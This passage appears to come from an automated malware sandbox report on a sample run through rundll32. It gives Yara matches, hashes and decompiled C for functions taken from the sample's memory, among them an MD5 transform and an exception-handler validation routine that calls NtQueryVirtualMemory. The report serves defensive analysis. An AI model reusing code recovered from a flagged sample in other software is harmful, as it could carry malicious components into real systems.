                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: memset
                                • String ID:
                                • API String ID: 2221118986-0
                                • Opcode ID: d9def6b715dbe5854ad3f939d119ea01d0ab3cc14373ec07a817a0717b2aaf57
                                • Instruction ID: d92890f292ed8e0b09e31e392da34ffb1b674f8db38b09d05e89509554a64461
                                • Opcode Fuzzy Hash: d9def6b715dbe5854ad3f939d119ea01d0ab3cc14373ec07a817a0717b2aaf57
                                • Instruction Fuzzy Hash: AF22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03434BF1 Relevance: 1.9, APIs: 1, Instructions: 611COMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 49%
                                			E03434BF1(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}


































































































                                0x03434bf4
                                0x03434bff
                                0x03434c02
                                0x03434c05
                                0x03434c06
                                0x03434c24
                                0x03434c26
                                0x03434c29
                                0x03434c2c
                                0x03434c2c
                                0x03434c2f
                                0x03434c2f
                                0x03434c32
                                0x03434c32
                                0x03434c35
                                0x03434c35
                                0x03434c52
                                0x03434c55
                                0x03434c6b
                                0x03434c6e
                                0x03434c88
                                0x03434c8b
                                0x03434ca1
                                0x03434ca4
                                0x03434ca6
                                0x03434cbe
                                0x03434cc1
                                0x03434cc4
                                0x03434cdc
                                0x03434cdf
                                0x03434cf9
                                0x03434cfc
                                0x03434d12
                                0x03434d15
                                0x03434d17
                                0x03434d2f
                                0x03434d34
                                0x03434d37
                                0x03434d4d
                                0x03434d50
                                0x03434d6a
                                0x03434d6d
                                0x03434d83
                                0x03434d86
                                0x03434d88
                                0x03434da3
                                0x03434da6
                                0x03434dbd
                                0x03434dc0
                                0x03434dc4
                                0x03434ddd
                                0x03434de0
                                0x03434de2
                                0x03434de5
                                0x03434e00
                                0x03434e03
                                0x03434e1c
                                0x03434e1f
                                0x03434e2f
                                0x03434e32
                                0x03434e4a
                                0x03434e4d
                                0x03434e67
                                0x03434e6a
                                0x03434e82
                                0x03434e85
                                0x03434e9b
                                0x03434e9e
                                0x03434eb6
                                0x03434eb9
                                0x03434ed1
                                0x03434ed4
                                0x03434eee
                                0x03434ef1
                                0x03434f07
                                0x03434f0a
                                0x03434f22
                                0x03434f25
                                0x03434f3f
                                0x03434f42
                                0x03434f5a
                                0x03434f5d
                                0x03434f73
                                0x03434f76
                                0x03434f8e
                                0x03434f91
                                0x03434fa9
                                0x03434fac
                                0x03434fbe
                                0x03434fc1
                                0x03434fd3
                                0x03434fd6
                                0x03434fe8
                                0x03434feb
                                0x03434fef
                                0x03434fff
                                0x03435002
                                0x03435010
                                0x03435013
                                0x03435025
                                0x03435028
                                0x0343503c
                                0x0343503f
                                0x03435041
                                0x03435051
                                0x03435054
                                0x03435066
                                0x03435069
                                0x03435077
                                0x0343507a
                                0x0343508c
                                0x0343508f
                                0x03435093
                                0x034350a3
                                0x034350a6
                                0x034350b8
                                0x034350bb
                                0x034350c9
                                0x034350cc
                                0x034350de
                                0x034350e1
                                0x034350f3
                                0x034350f6
                                0x0343510a
                                0x0343510d
                                0x03435121
                                0x03435124
                                0x03435138
                                0x0343513b
                                0x0343514f
                                0x03435152
                                0x03435166
                                0x03435169
                                0x0343517d
                                0x03435182
                                0x03435194
                                0x03435197
                                0x034351ab
                                0x034351ae
                                0x034351c2
                                0x034351c5
                                0x034351db
                                0x034351de
                                0x034351f2
                                0x034351f5
                                0x03435207
                                0x0343520a
                                0x0343521e
                                0x03435221
                                0x03435235
                                0x03435238
                                0x0343524c
                                0x03435255
                                0x03435258
                                0x03435261
                                0x0343526a
                                0x03435272
                                0x0343527a
                                0x03435284
                                0x03435299

                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: memset
                                • String ID:
                                • API String ID: 2221118986-0
                                • Opcode ID: b84fae2424a8dea2ca03a1429469610375b5738a21d8790c4dd2bcffc4a620be
                                • Instruction ID: ccaebeeae5bc33edf543cd5dca981655d1465f70d9b449e2dd6ab9401fbbed23
                                • Opcode Fuzzy Hash: b84fae2424a8dea2ca03a1429469610375b5738a21d8790c4dd2bcffc4a620be
                                • Instruction Fuzzy Hash: 4422847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034767CA Relevance: 1.8, Strings: 1, Instructions: 575COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID: 0-3916222277
                                • Opcode ID: 1d644000c0b60c4640ff4544e71da7a6670277de2039b1a8bdc3c06d72c036ec
                                • Instruction ID: bbf356dc88557b272accd51f81a56aa0859731817e189a9afecfee3f73030eb8
                                • Opcode Fuzzy Hash: 1d644000c0b60c4640ff4544e71da7a6670277de2039b1a8bdc3c06d72c036ec
                                • Instruction Fuzzy Hash: B942AF70A00B558FCB25CF69C4806EAF7F2FF49304F5989AEC49A9B755D338A486CB14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034384C1 Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E034384C1(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x343a380; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x343a3c8 = 1;
										__eflags =  *0x343a3c8;
										if( *0x343a3c8 != 0) {
											goto L60;
										}
										_t84 =  *0x343a380; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x343a3c8 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x343a380 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x343a388 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x343a384 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x343a388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x343a388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x343a3c8 = 1;
							__eflags =  *0x343a3c8;
							if( *0x343a3c8 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x343a388 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x343a388 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x343a3c8 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x343a388 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x343a380 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x343a388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x343a388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                0x034384cb
                                0x034384ce
                                0x034384d4
                                0x034384f2
                                0x00000000
                                0x034384f2
                                0x034384dc
                                0x034384e5
                                0x034384eb
                                0x034384fa
                                0x034384fd
                                0x03438500
                                0x0343850a
                                0x0343850a
                                0x0343850c
                                0x0343850f
                                0x03438511
                                0x03438511
                                0x03438513
                                0x03438516
                                0x00000000
                                0x00000000
                                0x03438518
                                0x0343851a
                                0x03438580
                                0x03438580
                                0x034386de
                                0x00000000
                                0x034386de
                                0x0343851c
                                0x0343851c
                                0x03438520
                                0x03438522
                                0x03438522
                                0x03438522
                                0x03438522
                                0x03438525
                                0x03438526
                                0x03438529
                                0x03438529
                                0x0343852d
                                0x03438531
                                0x0343853f
                                0x0343853f
                                0x03438547
                                0x0343854d
                                0x0343854f
                                0x03438551
                                0x03438561
                                0x0343856e
                                0x03438572
                                0x03438577
                                0x03438579
                                0x034385f7
                                0x034385f7
                                0x0343857b
                                0x0343857b
                                0x0343857b
                                0x034385f9
                                0x034385fb
                                0x034386dc
                                0x034386dc
                                0x00000000
                                0x03438601
                                0x03438601
                                0x03438608
                                0x00000000
                                0x00000000
                                0x0343860e
                                0x03438612
                                0x0343866e
                                0x03438670
                                0x03438678
                                0x0343867a
                                0x0343867c
                                0x00000000
                                0x00000000
                                0x0343867e
                                0x03438684
                                0x03438686
                                0x03438688
                                0x0343869d
                                0x0343869d
                                0x0343869f
                                0x034386ce
                                0x034386d5
                                0x00000000
                                0x034386d5
                                0x034386a3
                                0x034386a4
                                0x034386a6
                                0x034386a8
                                0x034386a8
                                0x034386aa
                                0x034386ac
                                0x034386ae
                                0x034386c2
                                0x034386c2
                                0x034386c5
                                0x034386c7
                                0x034386c7
                                0x034386c8
                                0x034386c8
                                0x00000000
                                0x034386b0
                                0x034386b0
                                0x034386b0
                                0x034386b9
                                0x034386ba
                                0x034386bc
                                0x034386be
                                0x034386be
                                0x00000000
                                0x034386b0
                                0x034386ae
                                0x0343868a
                                0x03438691
                                0x03438691
                                0x03438693
                                0x00000000
                                0x00000000
                                0x03438695
                                0x03438696
                                0x03438699
                                0x0343869b
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0343869b
                                0x00000000
                                0x03438691
                                0x03438614
                                0x03438617
                                0x0343861c
                                0x00000000
                                0x00000000
                                0x03438625
                                0x03438627
                                0x0343862d
                                0x00000000
                                0x00000000
                                0x03438633
                                0x03438639
                                0x00000000
                                0x00000000
                                0x0343863f
                                0x03438641
                                0x0343864a
                                0x0343864e
                                0x00000000
                                0x00000000
                                0x03438654
                                0x03438657
                                0x03438659
                                0x00000000
                                0x00000000
                                0x03438660
                                0x03438662
                                0x00000000
                                0x00000000
                                0x03438664
                                0x03438668
                                0x00000000
                                0x00000000
                                0x00000000
                                0x03438668
                                0x00000000
                                0x00000000
                                0x00000000
                                0x03438553
                                0x03438553
                                0x03438553
                                0x0343855a
                                0x00000000
                                0x00000000
                                0x0343855c
                                0x0343855d
                                0x0343855f
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0343855f
                                0x03438587
                                0x03438589
                                0x00000000
                                0x00000000
                                0x03438599
                                0x0343859b
                                0x0343859d
                                0x00000000
                                0x00000000
                                0x034385a3
                                0x034385aa
                                0x034385d6
                                0x034385d6
                                0x034385d8
                                0x034385da
                                0x034385ee
                                0x034385f0
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x034385dc
                                0x034385dc
                                0x034385dc
                                0x034385e5
                                0x034385e6
                                0x034385e8
                                0x034385ea
                                0x034385ea
                                0x00000000
                                0x034385dc
                                0x034385ac
                                0x034385ac
                                0x034385af
                                0x034385b1
                                0x034385c3
                                0x034385c3
                                0x034385c6
                                0x034385c8
                                0x034385c8
                                0x034385c9
                                0x034385c9
                                0x034385cf
                                0x034385cf
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x034385b3
                                0x034385b3
                                0x034385b3
                                0x034385ba
                                0x00000000
                                0x00000000
                                0x034385bc
                                0x034385bc
                                0x034385bd
                                0x00000000
                                0x00000000
                                0x00000000
                                0x034385bd
                                0x034385bf
                                0x034385c1
                                0x034385d4
                                0x00000000
                                0x00000000
                                0x00000000
                                0x034385d4
                                0x00000000
                                0x034385c1
                                0x03438533
                                0x03438536
                                0x03438539
                                0x00000000
                                0x00000000
                                0x0343853b
                                0x0343853d
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0343853d
                                0x03438502
                                0x03438504
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 03438572
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
